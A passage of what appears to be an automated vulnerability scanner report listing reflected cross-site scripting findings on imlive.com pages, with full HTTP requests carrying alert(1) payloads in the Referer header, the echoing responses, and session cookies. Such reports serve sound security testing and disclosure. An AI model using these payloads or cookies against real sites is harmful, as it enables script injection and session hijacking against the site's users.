   <head>
       <title>Disclaimer - Live Video Chat at ImLive</title>
       
<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/headerguest.css" />

<link rel="stylesheet" typ
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/disclaimer.asp&lr=1107816009&ud=0&pe=disclaimer.asp&rf=http://www.google.com/search?hl=en^q=3d32e'><script>alert(1)</script>90577f18320&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

2.201. http://imlive.com/forgot.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /forgot.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1365d'-alert(1)-'8c7ad16a976 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forgot.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=1365d'-alert(1)-'8c7ad16a976

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:38 GMT
Connection: close
Content-Length: 3308
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Imlive.com Customer Serv
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/forgot.aspx&he=imlive.com&ul=/forgot.aspx&rf=http://www.google.com/search?hl=en^q=1365d'-alert(1)-'8c7ad16a976&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

2.202. http://imlive.com/forgot.aspx [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /forgot.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f31f'-alert(1)-'d8c094b7adb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forgot.aspx HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=9f31f'-alert(1)-'d8c094b7adb

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:47 GMT
Connection: close
Content-Length: 3308
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Imlive.com Customer Serv
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/forgot.aspx&he=imlive.com&ul=/forgot.aspx&rf=http://www.google.com/search?hl=en^q=9f31f'-alert(1)-'d8c094b7adb&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

2.203. http://imlive.com/homepagems3.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /homepagems3.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e3d10'><script>alert(1)</script>76788ffdb68 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /homepagems3.asp HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FL%2bWXDSNB1qb%2fDfrHETDCj1A%3d; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000
Referer: http://www.google.com/search?hl=en&q=e3d10'><script>alert(1)</script>76788ffdb68

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:05:14 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2BBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2FLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3D; expires=Sat, 03-May-2008 14:05:14 GMT; path=/
Set-Cookie: ix=k; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
Set-Cookie: ASPSESSIONIDCARBBRTR=OFAEMBCBCGCOCIDCNNFPADIH; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:05:15 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 10285


<html>
   <head>
       
<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/headerguest.css" />

<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/hostbasic.c
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/homepagems3.asp&lr=1107816009&ud=0&pe=homepagems3.asp&rf=http://www.google.com/search?hl=en^q=e3d10'><script>alert(1)</script>76788ffdb68&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

2.204. http://imlive.com/hostmembers.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /hostmembers.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 39448'><script>alert(1)</script>4985a3648d9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /hostmembers.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=39448'><script>alert(1)</script>4985a3648d9

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:14:16 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:14:16 GMT
Connection: close
Content-Length: 10795
Vary: Accept-Encoding


<HTML>
   <HEAD>
       
       <TITLE>ImLive - Host Login</TITLE>
       
       <meta name="description" content="Welcome, ImLive Hosts. Please login to live video chat about everything from friendship and romance
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/login.asp?host&lr=1107816009&ud=0&pe=login.asp&rf=http://www.google.com/search?hl=en^q=39448'><script>alert(1)</script>4985a3648d9&qs=host&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

2.205. http://imlive.com/live-sex-chats/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9543d'-alert(1)-'3fbf0fbae6a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=9543d'-alert(1)-'3fbf0fbae6a

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:05 GMT
Connection: close
Content-Length: 39949
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/category.aspx&he=imlive.com&ul=/live-sex-chats/&rf=http://www.google.com/search?hl=en^q=9543d'-alert(1)-'3fbf0fbae6a&qs=cat=1&qs=cat=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent
...[SNIP]...

2.206. http://imlive.com/live-sex-chats/adult-shows/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/adult-shows/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd2e5'-alert(1)-'83f3da1d0da was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/adult-shows/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=dd2e5'-alert(1)-'83f3da1d0da

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:41 GMT
Connection: close
Content-Length: 25196
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
"text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/bt/btguest.aspx&he=imlive.com&ul=/live-sex-chats/adult-shows/&rf=http://www.google.com/search?hl=en^q=dd2e5'-alert(1)-'83f3da1d0da&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

2.207. http://imlive.com/live-sex-chats/cam-girls/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/cam-girls/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50e28'-alert(1)-'4ef9bdb79a0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/cam-girls/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=50e28'-alert(1)-'4ef9bdb79a0

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:23 GMT
Connection: close
Content-Length: 224507
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
ype="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=50e28'-alert(1)-'4ef9bdb79a0&qs=cat=1^roomid=10&qs=cat=1^roomid=10&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty
...[SNIP]...

2.208. http://imlive.com/live-sex-chats/cam-girls/categories/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/cam-girls/categories/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15c00'-alert(1)-'13ed03de9eb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/cam-girls/categories/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=15c00'-alert(1)-'13ed03de9eb

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
